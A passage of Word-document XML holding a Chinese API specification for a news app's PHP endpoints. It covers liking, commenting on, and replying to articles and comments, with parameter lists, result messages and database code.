        </w:rPr>
        <w:t>已取消点赞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B608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用户点赞失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F4A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148F1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8930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zan()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D049E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376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08E76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3065ED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51670D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9808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314EB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请先登录账号，然后点赞资讯文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AC4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40BAA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9FAE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F42B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7C45D4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1E009A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827A0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43347F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500644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83E9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EAB1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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B674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1691B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6EB49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02A29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0C84F2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 = $article_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63645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$data['aid_uid'] = $article['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8AF4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$article_zan = Db::name('article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CAF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1B22FD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85CD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(!empty($article_zan)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C17D1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($article_zan['zan'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D13E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Db::name('article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E525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17D97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0C05E7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597BDD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 =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE173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07224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76DD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1329AD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4100D8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587B8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157DE2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$article['zan'] - 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197239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 =&gt; $article['cai'] + 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1E30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367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】已取消点赞您所发布的资讯</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2E13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$article['uid'], $content, '', $article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A0D8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6AD7F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用户取消点赞成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F079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6C77EA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7149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81AC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Db::name('article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47885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537E29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2A19C9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3A662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 =&gt; 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEC4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1014DE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9C03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7B372E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0F09B2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0211B3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7C160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$article['zan'] + 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7399C4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 =&gt; $article['cai'] - 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2288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E479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】已点赞您所发布的资讯</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3816F2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$article['uid'], $content, '', $article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636D9C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F1DC2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33CE7E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13DA3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8594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8D6F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404AE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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AC31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$data['cai'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43005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7EE0C8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$article_zan_id = Db::name('article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107E11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4F6A62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($article_zan_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F579C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1F2B03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503392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6591FD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CABC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】已点赞您所发布的资讯</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5505C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$article['uid'], $content, '', $article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA62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30663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172E8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6EBFF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0E85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369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DC2D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FDC31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4D6899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该资讯文章不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CBE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68C5AF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DA13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2C7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2B72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CD37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用户点赞失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D551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DB2F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D78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30D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F334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/api/article/ping </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评论资讯文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632202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评论资讯文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD1C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4DE0A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E0F61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Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F23F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（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5150E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评论内容（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282D7F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用户发表评论成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748238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用户发表评论失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AF4A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59C58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8EB3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4288CC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0EC2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23B35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6472CA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2D40B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BBAE0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请先登录账号，然后评论资讯文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3EAD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7E8D0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4987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D7D0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input('param.content', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595D8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($content == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BFDD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2A2F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评论内容不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61284D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23A4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8A93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522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5D1C89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2AC1D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8AC7D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3C4A2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0356B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BA48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2713B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF7F4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2F7E0D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11DA1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77C2BE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(!empty($article)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050A0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 = $article_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD05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$content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2056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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9F70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5B9F6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$data['aid_uid'] = $article['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7AF3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$article_ping_id = Db::name('article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D25B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61067C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($article_ping_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D4FD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1605F1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7CFC57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77BBB8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-&gt;setInc('pingNum');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779373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】已评论您所发布的资讯</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBA21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$article['uid'], $content, '', $article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A689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0E755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用户发表评论成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BBCD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CF66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91B8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4557E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ED987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该资讯文章不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A213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26F78C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C8DF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3707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29F9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950D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用户发表评论失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D19AD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0D207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9E1D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CD1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0C5D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/api/article/ping_zan </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞｜取消点赞资讯文章评论</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596EBD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点赞｜取消点赞资讯文章评论</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085FFD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65870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92892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Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7481ED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ping_id     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯文章评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376F7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用户点赞｜取消点赞成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC0AF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已点赞；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已取消点赞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1AD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用户点赞失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0226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6F7B25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624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ping_zan()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6A5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9768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49D1C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6A5C31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DE4AA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8658C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请先登录账号，然后点赞资讯文章评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD4D6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0233BE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6254A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A268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$ping_id = input('param.ping_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048C95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($ping_id == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205BDD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F5B8C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资讯文章评论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762158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8502F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379C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B7D72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 = Db::name('article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A87C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48C6D0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0E4351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(!empty($ping)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4795EB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$data['pingId'] = $ping_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6CF2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$article_ping_zan = Db::name('article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37916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610F55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44BC6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(!empty($article_ping_zan)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0EE3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($article_ping_zan['zan'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784052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Db::name('article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569AF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112473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3E81B2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10A14F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17623F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2AD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199C5C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1E925C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-&gt;setDec('zan');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE216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】已取消点赞您所发布的资讯评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9058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$ping['uid'], $content, '', $ping['aid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F98B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10A6A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用户取消点赞成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B16A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0C5E43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4EB3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1548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Db::name('article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C76F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3AFC6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00ADC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259AD4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3FD316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0F98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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11666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201107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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4862FF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】已点赞您所发布的资讯评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F69E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$ping['uid'], $content, '', $ping['aid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483075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6088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0FCAC6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712F8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71DC8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A13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FE89B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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09981C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2B76DF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$article_ping_zan_id = Db::name('article_ping_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5F7D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0C59D7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($article_ping_zan_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBFF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A85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6C3FA8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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6125B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】已点赞您所发布的资讯评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7B01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$ping['uid'], $content, '', $ping['aid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF8D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19738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014E9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4016C8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06E6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C4F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434C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7D504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223C4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该文章评论不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4123B9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129E99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80DA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50C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6FB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D43B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用户点赞失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4C74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22C90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AFE0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2A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555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/api/article/ping_xia </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>追评资讯文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F62A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追评资讯文章</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F56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0E7D77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E5741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Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7477EA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（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376ACE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ping_id     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯文章评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178FDD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追评内容（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053D5E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用户追评成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E59DB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用户追评失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78484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703F6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1FF3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ping_xia()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACBB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90A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D009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7A7DE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AD593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E7656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请先登录账号，然后追评资讯文章</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEDA9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649EC7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46C8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75E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input('param.content', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA67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($content == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0460CA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03CE0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追评内容不可为空</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8A19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EFF5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5F2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4E8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42722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2FEE81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BEC52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642476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5D27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4A3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5A98A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643C0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6EEBA5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6143B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7DEC65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70F59D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$ping_id = input('param.ping_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A7E9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($ping_id == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A94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F158F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文章评论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093507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526DDA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56A8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67A59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 = Db::name('article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED623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382C9D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2A03B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(!empty($ping)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78096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 = $article_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC270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$data['ping_id'] = $ping_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A711D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$content;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10789B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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEA47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1FBAE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$data['ping_uid'] = $ping['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F548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$article_ping_xia_id = Db::name('article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D916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4B36B8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($article_ping_xia_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4D92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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F34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583D90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4CE534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-&gt;setInc('pingNum');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10094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】已追评您所发布的资讯评论</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E616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$ping['uid'], $content, '', $article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A943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22F41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 =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>用户追评成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F171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A28B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D854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2389B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0A01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该资讯文章评论不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59474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1FB448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5820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D66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E0A8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5A169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4E6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该资讯文章不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FD8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67D26C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9B9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12B7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138B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6D572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用户追评失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758471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7508D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508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F9C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7C7E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/api/article/ping_xia_zan </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>点赞｜取消点赞资讯文章追评</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6210D3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点赞｜取消点赞资讯文章追评</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A927A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207781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3BC6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Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE8D4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ping_xia_id     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>资讯文章追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38370A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用户点赞｜取消点赞成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328818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已点赞；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已取消点赞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A29E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用户点赞失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2501A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4BFFA7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C59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ping_xia_zan()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B54C5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1B93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22FD24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645BB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E2D00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F6C35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请先登录账号，然后点赞资讯文章追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455BE4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7164CA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A6AA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E819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$ping_xia_id = input('param.ping_xia_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793134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($ping_xia_id == '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAC1A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8793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文章追评</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1E5823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6627E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8DD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BB9C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$ping_xia = Db::name('article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717809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$ping_xia_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250833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6BBA9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(!empty($ping_xia)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2850BE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$data['pingId'] = $ping_xia_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C999A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$article_ping_xia_zan = Db::name('article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC05D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4DCCEA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95E49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(!empty($article_ping_xia_zan)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413EB8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($article_ping_xia_zan['zan'] == 1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E339B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Db::name('article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD51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556A0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5EB172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587A48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663F9C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5743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Db::name('article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC8B8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$ping_xia_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4D37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-&gt;setDec('zan');</w:t>
      </w:r>
    </w:p>
